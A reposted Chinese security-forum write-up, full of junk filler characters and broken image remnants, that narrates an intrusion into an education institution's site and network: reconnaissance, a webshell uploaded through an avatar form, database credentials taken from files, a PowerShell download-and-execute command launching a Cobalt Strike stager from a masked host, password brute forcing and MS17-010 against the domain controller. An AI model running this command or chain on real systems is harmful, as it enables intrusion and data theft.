中国网络渗透测试联盟

标题: 渗透实战 | 从外网直接打到内网全过程 [打印本页]
作者: admin    时间: 2024-3-1 19:41
标题: 渗透实战 | 从外网直接打到内网全过程

2 `/ K% K' w; n$ D' i# l. ? 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 5 `7 J2 D; s/ j9 k" v! e, w+ S

+ _% U0 q5 y# [! c# h, h

2 Q: i! a' {' b4 V/ t7 `# T3 w  + p& I; |% _$ E- P+ G- J9 H

5 T. m. H+ M" n9 Z7 |: s2 N

- L7 q& g, j3 B" X$ R( R1 [ 正文 " y6 M% M" [3 _' Y3 H# d

0 u" X/ X8 y0 B" P

: \+ \7 N* z; e! C: {  ( S" w: f* @+ L; }- F4 W' m6 ~

/ q& f5 z9 z* G" Y4 K

+ z* L5 A0 S: V# j. h: H: p 目标:www.xxxx.com(一家教育机构)
7 P% t3 Z% l) R( h2 K- h打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能 ; c2 o- ~3 d) ~( U' B/ h, O

) \( ~7 o$ G, U+ h ` C

) c0 S" q4 y1 R# s9 L6 f vshapes= + Z" e/ L: U% N @) x( ^. M6 m+ k0 @

9 j) L" R: }, l" x o# L+ t

" l- ]. p' T6 N 进行了简单的信息搜集
5 t, F* w9 V p, l- e5 k7 U
( E* X! k8 G; G- P 6 ?6 j- n t' C+ \$ i# a7 o

, S- r/ B6 b1 }2 h9 o2 x9 Q

' O7 Y( G& ]) Y t 子域名搜集 ; r8 r! b# U ?5 j+ V" d/ |

" p' E' J. K% M% j

+ P5 t6 }9 O3 Q$ m vshapes= " z) m: s8 I' }

" w: Q! \5 s( L( N

* I8 p) m& K% T3 x+ z fofa找资产
: i/ Z' m/ i0 s
K- {# {, _/ [7 J" q3 x* }) a" } & D2 _1 M- }. m

! A& t) ^. Y. @/ n

6 y1 L6 M/ f5 U# I$ P) f vshapes=0 H4 \' Y; Y, p% x0 |

2 T8 P8 c1 V3 X3 @

3 W; E3 T/ r6 U' k6 Y1 v8 c 一共七个资产。去重之后只有两个。
+ ^! O% c+ N% w; t W& _6 O
# o; c" l# K) M; e3 J; J6 n4 S# O7 M% {% \4 z; ?6 Q: V: U

2 o$ P: B9 D4 V

4 \) H) R3 x- g. n! E- k 目录探测 " C( C' d5 T$ T- ?8 j- z

# i3 J5 ]) v% I6 _: d& l/ M) s

2 F. ~2 o/ m4 f% ` vshapes=; X, `2 Y# b9 Q) _2 m' u- Y

6 h; e) E; F8 M( l" w$ p$ i, @9 \) o

) ^+ O& N; a/ L9 s# K! U" L 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
% E! M6 W! B) I: p t
) V9 `& q* y" D3 K3 \ / k! ^/ g# B( v( U' `8 g+ b

: o. h4 g) s3 L' D! S# k. ^& t- N

& C4 [6 q7 l+ G) e 我又尝试了通过修改返回包来绕过登录界面 % d) p2 l! ?- C) Z, n

2 U4 N$ U8 A# L3 V/ }! p

# f. h$ R. o- P/ S I) h2 w vshapes= % G* v$ y. q& G1 u! m; F

5 x. o! M+ h7 {' I) X7 v" [

; B1 v' Y% d2 w; R% ^% p F 还是不行,尝试注入无果. B1 x( U" S. _; K5 ]0 \

! {4 Q7 r" I/ v, }' i, q

: {" `+ w7 n- r# h+ ]1 m2 U vshapes=; Y3 t+ E6 w7 Y) ?+ t) j& {, j/ L s

5 O1 R0 {- {3 f' w2 f

+ l+ ]4 H0 b2 S' s 不过我目录探测出了一处Spring信息泄露
4 F' z' {3 U! n
9 R+ e3 y# r! _# O1 }1 G& `( Q% u7 m6 ]. {, \* D+ A+ w

. o7 n$ ]8 F+ T

3 e9 K7 |( {$ h$ }1 ~0 p" w8 i7 | vshapes=8 o. G: o* M+ }3 ^: p& }1 E3 Z

4 b* Q# d7 m6 j; U9 K" K8 v$ |

$ K+ g0 `, Q2 B 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 * V1 n3 a. v _: p. t i

0 V+ {8 Y5 | k" A" h

# N! \7 x& u$ W& \ vshapes= 3 w6 H9 B( c# a8 C0 Z2 b2 w7 c

$ y: U- M% j( P- Q

U+ [6 T" U5 o9 P 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 % v& c' ~! U; ]8 ~

6 H' H9 A0 t" ~) ?6 c6 r o

, K( C7 L, g5 i* e1 U1 P( M2 Z% l vshapes=% W+ t' _. X6 P7 N6 l$ |0 ]2 A

7 n6 @) `& [; c, [- N) b* q6 z9 _

% h% I; }, x7 A/ q9 f- s; y 获取有些师傅到这一步就手机抓包电脑测了。 ) j0 H# f& x2 u2 Q

" M4 [+ C+ `( q: i

# U* I2 _+ W% k, y/ f+ s Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 0 V" O y' a) f* e

: C' B( j( i, Q/ Z

}1 i) k+ Q3 h C* [: v) t 其中在一个公众号发现了小程序,可以进行注册。 # W, G9 C5 L4 K

6 s! T: Z. E* e7 D f' [' d7 ?

, t+ N, ], g8 {7 f1 { 看到了头像上传,尝试上传获取WebShell ~1 N9 |% Y/ P' @

: ^, {) S. ~2 X+ E8 D

0 M& m7 |/ k9 Q3 s, o! Z) v vshapes=# x. n3 K; h p' r; V

3 R& D) }! x: L" N2 e9 y8 U+ k

2 O: _2 P0 [6 j8 D- o- D3 c 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问" a2 L7 m3 I" C' E( `. W5 `

8 B4 ~& v2 f8 k. a* d* R# f

5 H% s) `' b5 D+ Y6 P/ l2 _ vshapes=$ n( N$ W9 {% o( W& f

. t6 X2 I0 s" W. M

1 ]7 \: ]0 P/ Q0 o% F# W8 L! ~4 X 然后上了大马 . G8 Z9 U! B# _2 X

* c% i$ c+ ~1 t8 @; w! X! q- k' c

' z9 Y; H% V. T; X( d vshapes=, y% {7 E9 ?( z: L8 g1 `/ T

( o# y& A$ g/ a

! b7 [( X1 u5 h4 l& t6 ]3 @) y vshapes=. }: d0 j. n& H/ E) o2 n

6 w* j2 z6 D1 M; h" I4 F' E

' R: e- H5 c5 D) D R 通过翻找文件发现数据库账号密码 % Q. f/ J) B, x7 ?; R

. c1 b7 R4 ^. ~& x+ U' t

! Z$ Y) F) k0 {( n- J1 f2 K vshapes=, V% j" o' j+ Q

! w/ j, H% w5 m2 q) Y& L ^

" m9 w0 N4 a/ P0 u% | --内网渗透- H' c1 S2 M; b+ h5 M" ~% E9 M; z

; `' s" q# F- ]; C7 T

. [ S) p) \) b' t. w 直接通过powershell执行 cs上线1 _7 N' V2 l9 \& Q7 i1 A4 V' ^" P

4 q- v3 C T+ i2 D

7 c0 p3 a8 I* t* b0 Z powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" . a, I% O. U) q7 v8 Z* `

3 s9 r( d/ `, c% ?2 B3 F0 r! k

7 \5 o5 T; |4 _. y; { vshapes= 7 l# K8 i$ b' }( N4 h( g& A

7 u5 g; R9 D$ b, p) A/ A

3 J7 }- p! Q% }$ J& m 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破7 b1 F! I0 j: a% Z

+ q$ C0 Y4 o: \3 o9 T

6 z! a, E. Z2 x7 T$ u( Z vshapes=; l% N5 K. ?4 |1 t* Y0 u- y

1 e% h9 F H1 t6 ?! m" _2 G$ x

# ]( Z( x* K5 ` c' q5 Z 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
8 r4 {. \8 z, k# `
- {" J2 {4 z" ^% }
4 c. Y$ z8 a, X& {2 b ; ^3 ^& x6 r/ X* L! w

& a* b( Y# q/ S% b( [

( J' @- V q" {8 A; S9 u9 `" n vshapes= " O& @3 Z8 G Z' Y8 M& R9 \' q

! D7 S: I3 u) M0 g8 u' E

3 }; I, C! N/ w" m$ B" A* s) H 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
0 x$ Q/ Y( e! p- q, q, A+ o0 X: [
& ]% F5 {5 U$ v# K/ M+ C$ O: p0 c: Q5 s c. P8 f2 I# t9 V

! `5 f$ m) s( _ M' [5 ~+ {) d6 a' G

: @2 c Y5 Q$ T vshapes= & f. g" r! u1 {, F

+ ~$ \7 y6 o' Z! l- T c

0 U8 T! ~5 H' Z: |$ e* ^5 K$ `
* f$ @4 s9 n4 [+ f# T7 ~
" b6 e! H" w" x3 _" ~* D/ L0 A6 b! D( b7 G7 Q* ^6 x7 J

2 a3 f. z* X5 N0 N

; B& \9 o7 a$ G( h; T1 l  0 V/ L# L* G( U# x4 k

( k; a$ Z; d, z1 Q5 ~2 h( e

6 l" W0 f% C! z8 Y 小结( Y* Q. u9 q( T" H8 t

3 }* T5 `; m: U* z3 L8 x) v" B

+ d0 t B& k) ~$ @  7 _8 J o5 c2 e! Y

: @: j7 ^& D* g" D; m# t0 W9 Y2 y

8 p6 g" Q# w! ]$ K' ]& { 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! 8 R' Y( t. p* X- r3 _' P

$ f! ]% y+ ^9 ^ X

" D2 S3 _! X5 U6 V   ( Q: E [2 g" N' G9 \ G9 p

& l; B, O% t; q& P6 v6 B2 y. v9 y: i3 h5 L5 _$ L& z& M

@- }& Q* J4 i' X1 N' N6 l7 i 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html7 G4 t4 j- G* N' I5 [

- [* T( B1 _5 n) S: X" v( ?

, s o6 }$ x. \ v6 f& d% l; G# B   ! R8 ~* r5 H; R





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2